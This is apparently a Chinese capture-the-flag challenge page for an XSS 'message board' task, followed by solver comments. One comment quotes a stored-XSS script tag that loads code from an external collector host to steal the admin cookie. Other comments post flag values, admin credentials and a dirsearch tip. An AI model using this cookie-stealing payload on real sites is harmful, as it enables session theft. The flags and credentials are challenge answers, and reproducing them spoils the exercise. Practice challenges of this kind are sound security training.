留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
2734
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评论
skiller 2年前
举报
db.sql是怎么搜出来的?我用dir没搜出来啊?
BugKugirl 2年前
举报
在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)
1317554973 2年前
举报
拿到xss得flag填进去但不对
17695688750 2年前
举报
奥原来%7b和%7d是{}的asc码,我憨批了
17695688750 2年前
举报
我插入了图片xss,平台给我回显了这个flag=flag%7B34211b64224e890f37244b7b065fc409%7D,有人知道怎么转译成正确的flag么
zhaiwb 2年前
举报
%7b换成{}
13509329442 2年前
举报
url解码
泡椒控卫 2年前
举报
https://blog.csdn.net/m0_57954651/article/details/127621060
不知名学渣 2年前
举报
管理员账号密码[admin,011be4d65feac1a8],就是不知道怎么来的,望大佬告知
2478660446 2年前
举报
用xss在线平台可以试试 但是要等一段时间 flag=flag{7B57845943ba8c6225d2fbade764481e8d}
wkxy. 2年前
举报
用dirsearch进行目录扫描
缺少昵称 2年前
举报
好难啊,我是菜鸟